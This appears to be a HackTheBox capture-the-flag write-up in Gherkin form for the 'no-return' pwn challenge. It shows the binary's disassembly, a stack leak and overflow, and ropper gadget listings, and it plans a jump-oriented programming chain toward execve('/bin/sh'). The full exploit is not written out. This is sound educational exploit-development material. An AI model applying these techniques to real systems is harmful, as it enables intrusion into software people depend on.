## Version 2.0
## language: en

Feature: no-return
  Site:
    Hackthebox
  Category:
    Pwn
  User:
    lkkpp
  Goal:
    Get shell and read the flag

  Background:
    Hacker's software:
    | <Software name> | <Version> |
    | Ubuntu          | 16.04.4   |
    | gdb-pwndbg      | 1.1.0     |
    | VMware          | 15.5.6    |
    | IDA             | 7.2       |
    | GNU strings     | 2.26.1    |
    | Ropper          | 1.13.5    |
    | Windows         | 10        |

  Machine information:
    Given I am accessing the challenge through its section
    When I open the challenge section
    Then I see a hint with the following sentence
    """
    A hop, skip, and a jump to the flag.
    """
    And it is possible to download the challenge

  Scenario: Sucess:Analyze the binary and finding bugs
    Given the source code is not provided
    Then I downloaded the binary
    And I get information from the binary
    """
    $ file no-return
    no-return: ELF 64-bit LSB executable, x86-64, version 1 (SYSV),
    statically linked, stripped
    """
    Then I notice that the binary was statically linked
    And this may indicate that it was done in assembler
    Then I analyzed it with IDA [evidences](ida.png)
    And I found some interesting things
    Then the first thing is the call to sys_write() [evidences](leakstack.png)
    """
    0x000000000040106D push    rsp
    0x000000000040106E xor     rax, rax
    0x0000000000401071 inc     rax
    0x0000000000401074 xor     rdi, rdi
    0x0000000000401077 inc     rdi             ; fd
    0x000000000040107A mov     rsi, rsp        ; buf
    0x000000000040107D mov     edx, 8          ; count
    0x0000000000401082 syscall                 ; LINUX - sys_write
    0x0000000000401084 sub
    """
    And what this call does is print 8 bytes of the stack A.K.A Leak the stack
    Then the program reserves 176 bytes for the stack
    And then it makes a call to sys_read() allowing 196 bytes
    """
    0x000000000040108B xor     rax, rax
    0x000000000040108E xor     rdi, rdi        ; fd
    0x0000000000401091 lea     rsi, [rsi]      ; buf
    0x0000000000401094 mov     edx, 192        ; count
    0x0000000000401099 syscall                 ; LINUX - sys_read
    """ [evidences](overflow.png)
    Then this implementation allows to overflow the stack 16 bytes
    And finally, the epilogue of the function does not end in a "ret"
    Then this epilogue is the following:
    """
    0x000000000040109B add     rsp, 8
    0x000000000040109F jmp     [rsp+var_8]
    """
    And on the other hand there is a function that is provided by the binary
    Then this function helps to assign values to some registers
    """
    0x0000000000401000 sub_401000 proc near
    0x0000000000401000 pop     rsp
    0x0000000000401001 pop     rdi
    0x0000000000401002 pop     rsi
    0x0000000000401003 pop     rbp
    0x0000000000401004 pop     rdx
    0x0000000000401005 pop     rcx
    0x0000000000401006 pop     rbx
    0x0000000000401007 xor     rax, rax
    0x000000000040100A jmp     qword ptr [rdi+1]
    0x000000000040100A
    """

  Scenario: Success:Exploiting the bug
    Given I identify a bug in the binary, a stack leak is provided
    And in the epilogue there is a JMP instruction instead of a RET
    Then therefore this cannot be exploited with Return Oriented Programming
    And there is a technique that lies in the execution by means of Jumps
    Then this technique is known as Jump Oriented Programming (JOP)
    """
    https://people.engr.ncsu.edu/tkbletsc/pubs/JOP.pdf
    """
    And as the paper indicates its model is based on a dispatcher gadget
    Then this special gadget will take care of running the functional gadgets
    And to find gadgets there are many tools, I used ropper
    """
    $ ropper --file no-return
    ...
    0x000000000040101c: mov rcx, rsp; std; jmp qword ptr [rdx];
    0x000000000040107a: mov rsi, rsp; mov edx, 8; syscall;
    ...
    0x0000000000401024: or al, 0xd9; std; jmp qword ptr [rcx];
    0x000000000040107e: or byte ptr [rax], al; add byte ptr [rax], al; syscall;
    0x0000000000401006: pop rbx; xor rax, rax; jmp qword ptr [rdi + 1];
    0x000000000040104c: pop rcx; mov rcx, rdx; pop rdx; jmp qword ptr [rcx];
    0x0000000000401050: pop rdx; jmp qword ptr [rcx];
    0x000000000040100f: rcr dh, 0xf1; jmp qword ptr [rdx];
    0x0000000000401055: rcr esi, 0xf1; jmp qword ptr [rdx];
    0x0000000000401068: xchg edi, ecx; std; jmp qword ptr [rdx];
    0x000000000040105a: xchg rax, rdx; fdivp st(1); jmp qword ptr [rcx];
    0x0000000000401067: xchg rdi, rcx; std; jmp qword ptr [rdx];
    ...
    0x0000000000401062: ret;
    0x000000000040105d: stc; jmp qword ptr [rcx];
    0x0000000000401039: stc; jmp qword ptr [rdx];
    0x0000000000401026: std; jmp qword ptr [rcx];
    0x000000000040101f: std; jmp qword ptr [rdx];
    0x0000000000401082: syscall;
    0x000000000040103f: wait; jmp qword ptr [rbp - 0x39]
    """
    Then I determined the epilogue as the dispatcher gadget
    """
    0x000000000040109B add     rsp, 8
    0x000000000040109F jmp     [rsp+var_8]
    """
    And seven gadgets that I consider functional with the function provided
    """
    0x0000000000401067 # xchg rdi, rcx; std; jmp qword ptr [rdx];
    0x0000000000401050  # pop rdx; jmp qword ptr [rcx];
    0x0000000000401082 # syscall
    0x000000000040101c #  mov rcx, rsp; std; jmp qword ptr [rdx];
    0x0000000000401062 # ret
    0x000000000040105a # xchg rax, rdx; fdivp st(1); jmp qword ptr [rcx];
    0x0000000000401000 # function
    """
    Then the idea is overflow the stack, overwrite the "var_8"
    And use these gadgets to make a call to
    """
    sys_execve('/bin/sh', NULL, 0);
    """
    Then due to the ability to maneuver with gadgets
    And many possible solutions I decided to make a diagram of my approach
    """
    [evidences](diagram.png)
    """
    And voila, this way I managed to exploit the binary [evidences](flag.png)
